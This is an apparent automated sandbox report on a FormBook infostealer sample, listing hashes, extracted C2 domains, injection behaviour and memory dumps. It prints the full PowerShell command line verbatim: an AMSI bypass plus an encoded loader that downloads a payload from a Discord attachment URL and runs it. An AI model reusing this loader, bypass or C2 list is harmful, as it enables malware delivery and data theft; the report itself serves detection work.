Analysis
-
max time kernel
150s -
max time network
125s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
26-07-2021 17:11
Static task
static1
Behavioral task
behavioral1
Sample
51c392870e9f21df2154b4e68a901ca1b5d9fccdcf00a4e6fa60ef07b4dfc541.64.exe.bin.exe
Resource
win7v20210408
General
-
Target
51c392870e9f21df2154b4e68a901ca1b5d9fccdcf00a4e6fa60ef07b4dfc541.64.exe.bin.exe
-
Size
65KB
-
MD5
06daa4f472383226392964c70e34c376
-
SHA1
b47a3554b0bf7250caa0f84090fb387cb332f31b
-
SHA256
51c392870e9f21df2154b4e68a901ca1b5d9fccdcf00a4e6fa60ef07b4dfc541
-
SHA512
9f220bc3f4c097d582f2958e57255e862f1b67191c6409ea0199a1c9ce3bd57830f7d9cd86c38925b7c61d744a77cbd51d2b59ffee9f66d57e0ee2a4ab654dee
Malware Config
Extracted
formbook
4.1
http://www.howmucharemyrarecoinsworth.com/jn7g/
mojketering.com
signinsimple.com
theartclouds.com
xmartmanagement.com
akademisantri.com
knitsu.com
funeralhomeswarrensburgil.com
formatohd.xyz
ortetiles.com
myeduhubs.com
twinpiques.com
itpaystobefashionable.com
3drinkminimum.com
wanpoo1.com
crystalclearlifecoachingcc.com
dronerealestate.net
langers.email
konstela.com
enteratecondanielvelasquez.com
graceinhomeschoolchaos.com
wanxin1.com
comma-la.store
egedenportreler.com
foslandlawfirm.site
oarange.xyz
mellatt.xyz
helgrooup.com
cartucce-toner.com
lalucacreative.com
salivasolve.com
hughesconsulting.agency
sundowntownthemovie.com
sacredsexacademy.com
riseandgrindcle.com
wildflowervtg.com
bienchezvous.net
alterduosrl.online
3jsgj.com
cleanwarrenton.com
redpenguy.com
undiscri.club
austincitytexas.com
terrenutra.com
lvbaoshan.com
tallercolombo.com
applicableturnout.club
arboledacoaching.com
stevewinchmusic.com
benandsara.com
denlasvegas.com
pragocoptertour.com
cyvape.com
alicehollywood.com
jokysun.com
856380176.xyz
umamipost.com
cod16.com
negociosconvictortorres.com
wabizo.net
46thpresidentofusa.com
timer-pooh.com
trademarkrates.com
transemmiconductor.com
groovepafes.com
Signatures
-
suricata: ET MALWARE FormBook CnC Checkin (GET)
-
Formbook Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/3904-160-0x0000000000400000-0x000000000042E000-memory.dmp formbook behavioral2/memory/3904-161-0x000000000041EBD0-mapping.dmp formbook behavioral2/memory/2508-171-0x0000000002A70000-0x0000000002A9E000-memory.dmp formbook -
Blocklisted process makes network request 3 IoCs
Processes:
Powershell.exeflow pid process 10 580 Powershell.exe 12 580 Powershell.exe 14 580 Powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
Powershell.execalc.exehelp.exedescription pid process target process PID 580 set thread context of 3904 580 Powershell.exe calc.exe PID 3904 set thread context of 2504 3904 calc.exe Explorer.EXE PID 2508 set thread context of 2504 2508 help.exe Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Powershell.execalc.exehelp.exepid process 580 Powershell.exe 580 Powershell.exe 580 Powershell.exe 580 Powershell.exe 580 Powershell.exe 580 Powershell.exe 580 Powershell.exe 580 Powershell.exe 3904 calc.exe 3904 calc.exe 3904 calc.exe 3904 calc.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe 2508 help.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 2504 Explorer.EXE -
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
calc.exehelp.exepid process 3904 calc.exe 3904 calc.exe 3904 calc.exe 2508 help.exe 2508 help.exe -
Suspicious use of AdjustPrivilegeToken 51 IoCs
Processes:
Powershell.execalc.exeExplorer.EXEhelp.exedescription pid process Token: SeDebugPrivilege 580 Powershell.exe Token: SeIncreaseQuotaPrivilege 580 Powershell.exe Token: SeSecurityPrivilege 580 Powershell.exe Token: SeTakeOwnershipPrivilege 580 Powershell.exe Token: SeLoadDriverPrivilege 580 Powershell.exe Token: SeSystemProfilePrivilege 580 Powershell.exe Token: SeSystemtimePrivilege 580 Powershell.exe Token: SeProfSingleProcessPrivilege 580 Powershell.exe Token: SeIncBasePriorityPrivilege 580 Powershell.exe Token: SeCreatePagefilePrivilege 580 Powershell.exe Token: SeBackupPrivilege 580 Powershell.exe Token: SeRestorePrivilege 580 Powershell.exe Token: SeShutdownPrivilege 580 Powershell.exe Token: SeDebugPrivilege 580 Powershell.exe Token: SeSystemEnvironmentPrivilege 580 Powershell.exe Token: SeRemoteShutdownPrivilege 580 Powershell.exe Token: SeUndockPrivilege 580 Powershell.exe Token: SeManageVolumePrivilege 580 Powershell.exe Token: 33 580 Powershell.exe Token: 34 580 Powershell.exe Token: 35 580 Powershell.exe Token: 36 580 Powershell.exe Token: SeIncreaseQuotaPrivilege 580 Powershell.exe Token: SeSecurityPrivilege 580 Powershell.exe Token: SeTakeOwnershipPrivilege 580 Powershell.exe Token: SeLoadDriverPrivilege 580 Powershell.exe Token: SeSystemProfilePrivilege 580 Powershell.exe Token: SeSystemtimePrivilege 580 Powershell.exe Token: SeProfSingleProcessPrivilege 580 Powershell.exe Token: SeIncBasePriorityPrivilege 580 Powershell.exe Token: SeCreatePagefilePrivilege 580 Powershell.exe Token: SeBackupPrivilege 580 Powershell.exe Token: SeRestorePrivilege 580 Powershell.exe Token: SeShutdownPrivilege 580 Powershell.exe Token: SeDebugPrivilege 580 Powershell.exe Token: SeSystemEnvironmentPrivilege 580 Powershell.exe Token: SeRemoteShutdownPrivilege 580 Powershell.exe Token: SeUndockPrivilege 580 Powershell.exe Token: SeManageVolumePrivilege 580 Powershell.exe Token: 33 580 Powershell.exe Token: 34 580 Powershell.exe Token: 35 580 Powershell.exe Token: 36 580 Powershell.exe Token: SeDebugPrivilege 3904 calc.exe Token: SeShutdownPrivilege 2504 Explorer.EXE Token: SeCreatePagefilePrivilege 2504 Explorer.EXE Token: SeDebugPrivilege 2508 help.exe Token: SeShutdownPrivilege 2504 Explorer.EXE Token: SeCreatePagefilePrivilege 2504 Explorer.EXE Token: SeShutdownPrivilege 2504 Explorer.EXE Token: SeCreatePagefilePrivilege 2504 Explorer.EXE -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
51c392870e9f21df2154b4e68a901ca1b5d9fccdcf00a4e6fa60ef07b4dfc541.64.exe.bin.exePowershell.exeExplorer.EXEhelp.exedescription pid process target process PID 3980 wrote to memory of 580 3980 51c392870e9f21df2154b4e68a901ca1b5d9fccdcf00a4e6fa60ef07b4dfc541.64.exe.bin.exe Powershell.exe PID 3980 wrote to memory of 580 3980 51c392870e9f21df2154b4e68a901ca1b5d9fccdcf00a4e6fa60ef07b4dfc541.64.exe.bin.exe Powershell.exe PID 580 wrote to memory of 3904 580 Powershell.exe calc.exe PID 580 wrote to memory of 3904 580 Powershell.exe calc.exe PID 580 wrote to memory of 3904 580 Powershell.exe calc.exe PID 580 wrote to memory of 3904 580 Powershell.exe calc.exe PID 580 wrote to memory of 3904 580 Powershell.exe calc.exe PID 580 wrote to memory of 3904 580 Powershell.exe calc.exe PID 2504 wrote to memory of 2508 2504 Explorer.EXE help.exe PID 2504 wrote to memory of 2508 2504 Explorer.EXE help.exe PID 2504 wrote to memory of 2508 2504 Explorer.EXE help.exe PID 2508 wrote to memory of 2652 2508 help.exe cmd.exe PID 2508 wrote to memory of 2652 2508 help.exe cmd.exe PID 2508 wrote to memory of 2652 2508 help.exe cmd.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\51c392870e9f21df2154b4e68a901ca1b5d9fccdcf00a4e6fa60ef07b4dfc541.64.exe.bin.exe"C:\Users\Admin\AppData\Local\Temp\51c392870e9f21df2154b4e68a901ca1b5d9fccdcf00a4e6fa60ef07b4dfc541.64.exe.bin.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$76545677866555677886556778657=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,56,53,56,55,57,51,51,50,50,48,56,55,55,49,48,55,53,51,47,56,54,51,56,57,56,49,51,54,56,53,52,48,48,51,55,50,50,47,109,101,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($76545677866555677886556778657)|I`E`X3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\WINDOWS\syswow64\calc.exe"{path}"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\help.exe"C:\Windows\SysWOW64\help.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\WINDOWS\syswow64\calc.exe"3⤵
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/580-121-0x0000022A255E0000-0x0000022A255E2000-memory.dmpFilesize
8KB
-
memory/580-120-0x0000022A0D080000-0x0000022A0D081000-memory.dmpFilesize
4KB
-
memory/580-122-0x0000022A255E3000-0x0000022A255E5000-memory.dmpFilesize
8KB
-
memory/580-125-0x0000022A26080000-0x0000022A26081000-memory.dmpFilesize
4KB
-
memory/580-142-0x0000022A255E6000-0x0000022A255E8000-memory.dmpFilesize
8KB
-
memory/580-158-0x0000022A265A0000-0x0000022A265FA000-memory.dmpFilesize
360KB
-
memory/580-114-0x0000000000000000-mapping.dmp
-
memory/580-162-0x0000022A255E8000-0x0000022A255E9000-memory.dmpFilesize
4KB
-
memory/2504-167-0x0000000004F20000-0x0000000005085000-memory.dmpFilesize
1.4MB
-
memory/2504-175-0x00000000063A0000-0x00000000064EE000-memory.dmpFilesize
1.3MB
-
memory/2508-170-0x0000000000370000-0x0000000000377000-memory.dmpFilesize
28KB
-
memory/2508-169-0x0000000000000000-mapping.dmp
-
memory/2508-171-0x0000000002A70000-0x0000000002A9E000-memory.dmpFilesize
184KB
-
memory/2508-173-0x0000000002E50000-0x0000000003170000-memory.dmpFilesize
3.1MB
-
memory/2508-174-0x0000000002D40000-0x0000000002DD3000-memory.dmpFilesize
588KB
-
memory/2652-172-0x0000000000000000-mapping.dmp
-
memory/3904-166-0x00000000028D0000-0x0000000002A1A000-memory.dmpFilesize
1.3MB
-
memory/3904-165-0x0000000003010000-0x0000000003330000-memory.dmpFilesize
3.1MB
-
memory/3904-161-0x000000000041EBD0-mapping.dmp
-
memory/3904-160-0x0000000000400000-0x000000000042E000-memory.dmpFilesize
184KB